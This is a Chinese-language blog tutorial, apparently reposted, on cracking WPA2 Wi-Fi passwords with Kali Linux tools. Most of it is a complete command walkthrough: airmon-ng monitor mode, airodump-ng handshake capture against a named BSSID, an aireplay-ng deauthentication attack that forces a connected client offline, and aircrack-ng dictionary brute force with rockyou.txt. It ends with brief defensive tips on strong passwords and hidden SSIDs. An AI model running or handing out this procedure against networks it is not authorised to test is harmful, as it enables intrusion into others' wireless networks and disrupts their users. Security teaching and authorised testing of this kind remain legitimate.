無線安全專題01--kali破解WPA


  最近一直用flask寫自己的博客框架,等過段時間才能將其分享出來,所以在此期間決定開個無線安全的專題,分享一些無線安全方面的知識。

  好了,廢話不多說,咱們進入今天的主題,使用kali linux上的無線安全工具對wpa加密的wifi進行密碼破解。由於現在wep加密太少了,所以直接略過,選擇破解wpa。WPA破解是通過截獲客戶端和路由器之間的握手包,根據字典的大小進行暴力破解,也就是說字典的大小直接決定了破解的成功與否(我的新書《Python爬蟲開發與項目實戰》出版了,大家可以看一下樣章

 

 

  操作系統:kali linux , 硬件:無線網卡 WN722N

  (1)打開終端:1.輸入ifconfig,查看無線網卡是否加載了

 

        2.輸入:airmon-ng start wlan3,將網絡啟動為監聽模式

 

    

       3.輸入:airodump-ng wlan3mon 監聽網絡數據包 ,如果出現以下錯誤,繼續執行圖中代碼。

             繼續輸入:airodump-ng wlan3mon,會出現監聽界面。

        

 

        從監聽界面中我們可以看到這個wifi的mac地址8C:AB:8E:A9:CB:60,加密方式:WPA2,所在的信道1.

        這個wifi現在有一個客戶端正在進行連接。接下來開始抓包,抓取握手包。

 

        4.輸入 airodump-ng -c 1 --bssid 8C:AB:8E:A9:CB:60 -w phi wlan3mon

          -c:指定信道 --bssid:指定wifi mac  -w:指定抓取的數據包存儲的文件

 

        5:這時候我們需要再開啟一個終端進行取消驗證攻擊,迫使這個已經連上的客戶端斷開。

        這樣當客戶端自動連接的時候,就可以抓取這個握手包了。

 

        在新的終端中執行: aireplay-ng -0 3 -a 8C:AB:8E:A9:CB:60 -c 70:1A:04:B7:1A:90 wlan3mon

          -0:指定為取消驗證攻擊   3:攻擊次數 -a:指定ap的mac  -c:指定客戶端的mac  

 

 

       6:執行完之后,過一會就會看到監聽到了握手包。

        

 

 

      7:既然抓到了握手包,Ctrl+C停止抓包。使用aircrack-ng進行暴力破解。

      在終端中輸入:aircrack-ng -w /usr/share/wordlists/rockyou.txt phi-01.cap 

        -w:指定破解用的密碼字典  phi-01.cap:這個是之前抓取握手包的數據包

 

      大約過了5分鍾,爆破成功.出現了KEY FOUND后面的中括號中就是密碼。

 

  (2)總結:

    1.由於WPA破解是采用暴力破解的方式(路由器沒有開啟wps),字典越大,破解的可能性越大。所以大家盡量設置復雜的密碼,多位數+字母。

    2.很多人采取隱藏SSID,不暴露wifi名稱的方式來防止被破解,事實並沒有什么用,因為整個破解過程中並不需要知道你的wifi名稱。

 

 

  今天的分享就到這里,下一篇繼續分析。如果大家覺得還可以呀,記得推薦呦。


 歡迎大家支持我公眾號:   

本文章屬於原創作品,歡迎大家轉載分享。尊重原創,轉載請注明來自:七夜的故事 http://www.cnblogs.com/qiyeboy/
 
        
 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM